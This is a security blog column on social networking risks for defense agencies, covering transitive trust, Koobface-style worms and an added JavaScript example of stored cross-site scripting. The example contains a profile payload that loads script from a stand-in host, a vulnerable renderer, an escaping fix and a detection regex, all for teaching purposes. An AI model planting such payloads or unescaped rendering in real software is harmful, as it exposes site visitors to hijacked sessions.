The Field Report
There are 18,000 banking institutions in the U.S., and somebody has to blog about their breaches, concerns and security successes.
Defense and intelligence agencies must remain vigilant about the targeting of personnel who use social networking services. Social nets simply make it easier to identify and target people with access to information that adversaries want. Many users of these services may inadvertently disclose their affiliations to sensitive government programs or activities, and without realizing it, make themselves attractive targets for exploitation.
The other issue referenced in the Marine Corps ban was the potential to use social nets to distribute malware. Exploits that use social networks are not an entirely new concept. Just as the first network-aware viruses harvested email contact lists to propagate across the Internet, social net malware exploits the inherent transitive trust between members of online social groups to infect new computers. Transitive trust describes the shared confidence in the quality and security of communications among groups of users on sites like MySpace, Twitter and Facebook: when communicating with peers on a social networking site, members assume that a message arriving from inside their social circle is authentic. Many exploits use this trust to socially engineer users who otherwise know better than to click on links sent by strangers, because the link appears to come from a friend whose account has already been compromised.
Social net malware falls into two classifications: malware that lives within the social net ecosystem (e.g., malicious JavaScript loaded into a profile page, which runs in the browser of every member who views that profile) and malware that uses the social net only as a mechanism to deliver malicious messages and links to new victims. The Koobface worm works the second way: the malware itself lives outside the social networking ecosystem, but it uses compromised accounts on social nets to send the messages through which it propagates across the Internet.
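The first category above, script stored in a profile field and served to everyone who views the page, comes down to how the site renders user-supplied content. The snippet below is an added example, not code from the original post or from any real social networking site: a constructed profile whose bio field carries a script payload, a vulnerable renderer that interpolates it straight into HTML, and a hardened renderer that HTML-encodes every user-controlled value first. The profile data, the payload URL and the function names are all assumptions made for illustration.

```javascript
// Added example (not from the original post). Demonstrates why malicious
// JavaScript "loaded into a profile page" runs for every viewer: the page
// template treats user input as markup. Everything below is constructed.

// Constructed sample profile: the bio field carries a stored-script payload.
const profile = {
  name: "alice",
  bio: 'Hi there! <script src="https://example.invalid/w.js"></script>',
};

// Vulnerable renderer: raw string interpolation. The script tag is emitted
// as-is, so each viewer's browser executes it with the viewer's own session,
// which is what lets such a payload spread along the social graph.
function renderProfileUnsafe(p) {
  return `<h1>${p.name}</h1><p class="bio">${p.bio}</p>`;
}

// Encode the five characters that can change HTML context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened renderer: same template, but every user-controlled value is
// encoded, so the browser displays the payload as text instead of running it.
function renderProfileSafe(p) {
  return `<h1>${escapeHtml(p.name)}</h1><p class="bio">${escapeHtml(p.bio)}</p>`;
}

// Coarse check a reviewer or a stored-content filter can run over rendered
// profile HTML: does it contain an executable element or an inline event
// handler? (Heuristic only; a real filter needs an HTML parser.)
function containsActiveContent(html) {
  return /<\s*(script|iframe|object|embed)\b|\bon[a-z]+\s*=/i.test(html);
}

console.log("unsafe:", renderProfileUnsafe(profile));
console.log("safe:  ", renderProfileSafe(profile));
console.log("unsafe active?", containsActiveContent(renderProfileUnsafe(profile)));
console.log("safe active?  ", containsActiveContent(renderProfileSafe(profile)));
```

Run with `node`. The point of the contrast is that the payload is identical in both cases; only the rendering step decides whether the social net itself becomes the execution environment (first category) or the profile is merely an inert carrier.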
For non-defense networks, the takeaway here is that social nets themselves don't present a level of risk that we haven't seen before. Sure, social nets can host and transmit malicious code, but so can any website or e-mail system. If your organization is not concerned about the targeting of personnel who handle sensitive military or intelligence data, there's little reason to follow the Marine Corps' example and ban social networking sites outright. Social net risks can be managed with the same processes and techniques already used to secure web access and email communications: URL filtering and reputation checks on links, browser and endpoint patching, and user awareness training that treats a link from a "friend" with the same suspicion as a link in an unexpected e-mail.
Eric M. Fiterman is a former FBI special agent and founder of Methodvue, a consultancy that provides cybersecurity and computer forensics services to the federal government and private businesses.